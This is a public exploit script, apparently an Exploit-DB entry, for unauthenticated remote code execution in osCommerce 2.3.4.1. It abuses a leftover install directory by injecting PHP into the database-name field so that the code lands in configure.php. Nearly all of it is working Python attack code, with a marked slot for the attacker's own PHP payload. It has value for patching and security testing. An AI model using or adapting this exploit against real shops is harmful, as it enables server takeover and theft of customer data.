# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution# Date: 29.0.3.2018# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net># Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable# Tested on: Linux, Windows# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject# PHP code into the config file and then simply executing the code by opening it.import requests
# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url ="http://localhost//oscommerce-2.3.4.1/catalog/"
target_url ="http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"
data ={'DIR_FS_DOCUMENT_ROOT':'./'}# the payload will be injected into the configuration file via this code# 'define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .# so the format for the exploit will be: '); PAYLOAD; /*
payload ='\');'
payload +='system("ls");'# this is where you enter you PHP payload
payload +='/*'
data['DB_DATABASE']= payload
# exploit it
r = requests.post(url=target_url, data=data)if r.status_code ==200:print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n"+ base_url +"install/includes/configure.php")else:print("[-] Exploit did not execute as planned")
